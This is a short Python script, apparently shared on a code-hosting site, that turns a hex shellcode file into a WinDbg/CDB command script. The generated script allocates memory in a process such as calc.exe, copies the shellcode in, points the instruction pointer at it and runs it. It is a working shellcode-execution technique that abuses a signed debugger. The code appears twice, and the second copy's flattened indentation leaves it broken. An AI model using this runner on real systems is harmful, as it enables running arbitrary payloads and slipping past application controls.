3xocyte/sc-cdb.py

## sc-cdb.py
#!/usr/bin/env python

# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

src = open('shellcode', 'r')
sc = src.read()
src.close

copy = ";eb @$t0+"
payload = ""

# allocate this:
allocate = len(sc)/2

for i in range(allocate):
	count = "{:02x}".format(i)
	pos = i * 2
	bytes = sc[pos] + sc[pos+1]
	if i % 4 == 0:
		payload += "\r\n" + copy + count.upper() + " " + bytes.upper()
	else:
		payload += copy + count.upper() + " " + bytes.upper()

output = ".foreach /pS 5  ( register { .dvalloc " + str(allocate) + " } ) { r @$t0 = register }"+payload+"\r\nr @$ip=@$t0\r\ng\r\nq\r\n"
dest = open("output.wds", "w")
dest.write(output)
dest.close
	#!/usr/bin/env python

	# run: cdb.exe -cf output.wds -o calc.exe
	# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

	src = open('shellcode', 'r')
	sc = src.read()
	src.close

	copy = ";eb @$t0+"
	payload = ""

	# allocate this:
	allocate = len(sc)/2

	for i in range(allocate):
	count = "{:02x}".format(i)
	pos = i * 2
	bytes = sc[pos] + sc[pos+1]
	if i % 4 == 0:
	payload += "\r\n" + copy + count.upper() + " " + bytes.upper()
	else:
	payload += copy + count.upper() + " " + bytes.upper()

	output = ".foreach /pS 5 ( register { .dvalloc " + str(allocate) + " } ) { r @$t0 = register }"+payload+"\r\nr @$ip=@$t0\r\ng\r\nq\r\n"
	dest = open("output.wds", "w")
	dest.write(output)
	dest.close